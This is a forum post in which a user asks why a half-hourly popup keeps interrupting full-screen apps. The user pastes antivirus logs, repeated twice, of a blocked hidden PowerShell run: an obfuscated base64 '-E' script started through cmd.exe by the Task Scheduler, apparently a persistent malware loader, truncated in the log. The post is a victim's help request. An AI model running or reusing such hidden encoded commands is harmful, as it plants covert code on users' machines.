|
|
每过半小时就跳出来一次,强行打断我的全屏应用。全盘查杀过病毒了没发现什么问题,请问是什么情况,如何解决?
![]()
防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTAHQAcgAuAEcAZQB0AEIAeQB0AGUAcwA
操作结果:已阻止
进程ID:7296
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:C:\Windows\system32\cmd.EXE /c powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTA
父进程ID:2328
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTAHQAcgAuAEcAZQB0AEIAeQB0AGUAcwA
操作结果:已阻止
进程ID:7296
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:C:\Windows\system32\cmd.EXE /c powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTA
父进程ID:2328
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
|
|
收藏